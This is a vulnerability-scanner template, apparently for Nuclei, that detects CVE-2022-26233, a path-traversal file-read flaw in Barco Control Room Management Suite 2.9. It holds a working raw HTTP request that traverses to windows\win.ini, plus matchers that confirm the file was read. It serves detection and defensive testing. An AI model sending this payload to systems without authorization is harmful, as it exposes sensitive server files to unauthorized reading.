47 lines
1.9 KiB
YAML
47 lines
1.9 KiB
YAML
id: CVE-2022-26233
|
|
|
|
info:
|
|
name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
|
|
remediation: |
|
|
Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
|
|
reference:
|
|
- https://0day.today/exploit/37579
|
|
- http://seclists.org/fulldisclosure/2022/Apr/0
|
|
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-26233
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00628
|
|
epss-percentile: 0.78973
|
|
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: barco
|
|
product: control_room_management_suite
|
|
tags: cve,cve2022,barco,lfi,seclists,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
# digest: 490a0046304402201c23beee17ba96dc0ff0bbdc4e7172549f786fda33dbfa8ab2e4d40c063b36d402203fd354fae09d18db6b7b35b96a5a3b15e620529582d196bfe0246a76b794c5df:922c64590222798bb761d5b6d8e72950 |